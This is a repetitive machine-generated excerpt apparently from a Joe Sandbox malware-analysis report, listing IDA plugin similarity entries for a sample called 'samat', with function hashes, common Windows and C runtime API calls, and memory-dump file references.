                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e9ade2ef335731114cf6dcd232dc74199ce15689346e746a6c7639da1021e9a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D06712B0874642EF553B709C5727892596F48711B94543AD80B4A393DDBDA8494263
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                                      • Instruction ID: f0755f2c32e9bafdd37f79b70449d6df1b209dd39095ff0845914522cdaa6ba7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3512E23B0924186E764BA35DC0677EE198BF44BA4F944B32DD6D0B7E5CEBCD4018626
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                      • Instruction ID: ca4881f2439b6a0db14825e5b2976e72329e4b77d3a2dc183c218889a977bddc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E911E222708A9281DB20AB25EC01269E365BB41FF4F944336EE7D077D8CEBCD0508701
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12D5839), ref: 00007FF7E12D5957
                                                                                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E12D5839), ref: 00007FF7E12D596D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e8ab9bb02cc0683afc6f00cb121f9b139e493fd4fa681e6e1c3fca734843079
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB118F6270C64282EB54AB24E85227AF774FB85771F900237FA9D819D8EFBCD414DB21
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                                                      • Instruction ID: 384b13feaabc76cbe0be76cd1237357d11771de89fb7f0a53847a95effb6927e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1E08611F0924243FF057BF1DC4B37992586F94700FC44437C80D822A1DDBC68418332
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABC6
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E12DA9D5,?,?,00000000,00007FF7E12DAA8A), ref: 00007FF7E12DABD0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                      • Instruction ID: f9f5ac7ec8eeb59d3cce01a8abfe12ee8a06950ccdb5c6ab72f0f5f70853a75d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3221F612F0C68201FBA47751DC42779928A9F947A0F88463BD92E477C5DEFCE4814322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                      • Instruction ID: 881fb8897f6d56f25c0c034f21346f752949e835b6a4b3ffb2e7b9e118edaf5b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1419933A1824587EB34AA15E952379B3A4FB56751F900132E68E436D1CFBEE442CB62
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d9b876d10d805dff503d874c4ea45c5a09dbb383c6c45e0b037d67d7559761f
                                                                                                                                                                                                                                                                                      • Instruction ID: dd3463ab9541b6d61e452bc038bc0066947e0b485bf43a05d708a65165750640
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d9b876d10d805dff503d874c4ea45c5a09dbb383c6c45e0b037d67d7559761f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0521A621B1865146FB50BB22AD063BAD659BF45BC4FC98432EF0D0B786CEBDE081C312
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                                                      • Instruction ID: 979095f411f82d72718147561d2a045645e09917d5c878a80302cb4a388fb3c5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64315B23F1868286E7117B55CC523BCA698BB91B95FD20137E95D037D2CEFDA4418723
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                                                      • Instruction ID: 53ddbee1291033f0ee23eb03d7878ce34820801dea9375483bd762868ae6f660
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08217E72B0474689EF14AF68C8813EC73A8EB04718F844637E75E07A85DFB8E545C752
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                      • Instruction ID: bc2227f15ee0209f2fbec602c53c91e3ccf383f44c715bb52245c600c7a9a5c0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93113363B1864146EB60BF21D802379E278AF95B84F944433EA8C57A95CFFDE4004762
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                      • Instruction ID: d0648260a8084942889e47fd337e45bb410f4b071db79b1c47053612288ed481
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2212932B08A8187DB62AF18D842379B3A4FB84F54F948236EB6D876D5DF7CD4008B11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                      • Instruction ID: 0946c83fcadbf284fe5f66d71f94e3fac3bae1d626e9de2e6949069bcac39978
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C018262B0874141EB04AF62DD0266DE6A9EF95FE0F884A32DE5C57BE6CEBCD4014316
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                                                                      • Instruction ID: ac454af58a42ae2c2870f655197a2197843455618fdbf10b948415cd39cb12fa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95018B22F1D68246FF717A219D033799298AF507D8FD442B7EA5C826C6DFFCA4404223
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d0e12d238922c57c5d9ce8fe34dab594bbed19bdc67f4572bfb07b010253cf0
